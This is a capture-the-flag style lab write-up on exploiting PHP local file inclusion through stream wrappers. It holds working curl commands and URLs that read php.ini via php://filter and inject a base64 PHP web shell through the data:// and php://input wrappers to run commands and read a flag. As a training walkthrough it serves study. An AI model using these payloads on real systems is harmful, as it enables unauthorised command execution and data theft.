# PHP Wrappers

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F4yMZ5X03EK0CVJdhP4O5%2Fimage.png?alt=media&#x26;token=09e087a6-d56c-4397-b3dd-09f10744d148" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
curl "http://94.237.49.182:39505/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F0RXALxtUBCtNpsvMz2My%2Fimage.png?alt=media&#x26;token=fd49dc84-c1f2-4dae-a990-b3a79a38637b" alt=""><figcaption></figcaption></figure>

ORRRR we could just visit the site

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FdKNt3tKc8qCbhgL8MjrU%2Fimage.png?alt=media&#x26;token=a596e6c2-4559-4c7f-9fc7-c3166fde7af0" alt=""><figcaption></figcaption></figure>

Just decode it in the terminal and as we can see here the allow\_url\_include is on which means that we can do some rce.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2Ffc82Vi4rLXPzdUFXzkWM%2Fimage.png?alt=media&#x26;token=a076eea9-95f9-4a76-a4d5-69de58aad340" alt=""><figcaption></figcaption></figure>

```
echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FZfLTYAbQE1Ofk4zgsV8V%2Fimage.png?alt=media&#x26;token=eb2c2350-70f9-450c-a6ff-e75e39ff6d32" alt=""><figcaption></figcaption></figure>

As we can see here that we have rce in the server

* First pov here in curl

{% code overflow="wrap" %}

```
curl -s 'http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F66G9MuBVv9K60ZREj9fb%2Fimage.png?alt=media&#x26;token=c3aafe7f-3a00-4845-8c35-64fbb8ae9d33" alt=""><figcaption></figcaption></figure>

* Second pov here in the browser

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=i
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F5wmuccSAunvr5qiKAwjS%2Fimage.png?alt=media&#x26;token=059902c2-38fe-4fd0-a5de-9fb10bd387c8" alt=""><figcaption></figcaption></figure>

After that we can just display the files in the current directory of web server

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FlKFcXqLJe74JZUot7Euf%2Fimage.png?alt=media&#x26;token=ab64b918-a4a0-4849-9ea3-969fe7c0a1f2" alt=""><figcaption></figcaption></figure>

Then after that we can just view the flag in the / directory

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cd /; ls
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FlTaBPG7LKbKbbG1f33Md%2Fimage.png?alt=media&#x26;token=25583b26-153e-488b-811c-de22bcaceccc" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat /37809e2f8952f06139011994726d9ef1.txt
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2Fv0FAWec5tccm8H9ThL7T%2Fimage.png?alt=media&#x26;token=fb71699f-d09a-4103-8bd6-7b074bd72b3b" alt=""><figcaption></figcaption></figure>

**For the second way to get the rce we will try the input wrapper**

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FDuofDlUAiomPxno8fLtv%2Fimage.png?alt=media&#x26;token=d68f3475-3ca7-4bac-be93-50120de08888" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://94.237.49.182:39505/index.php?language=php://input&cmd=ls"
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F4u0bQOlH0IJRbMzTkJEk%2Fimage.png?alt=media&#x26;token=0191a167-fc47-4278-900e-f086232f7af4" alt=""><figcaption></figcaption></figure>

**For the third way we will try the expect wrapper**

```
echo 'BASE64 OF php.ini' | base64 -d | grep expect
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FJakxuy3Xlodmt4zLHePi%2Fimage.png?alt=media&#x26;token=62b9b613-2661-4138-8275-271594fc3958" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FARzItkPzHMOBV6FQz31R%2Fimage.png?alt=media&#x26;token=dfb44594-3b58-437e-96ed-28726dbbcab5" alt=""><figcaption></figcaption></figure>
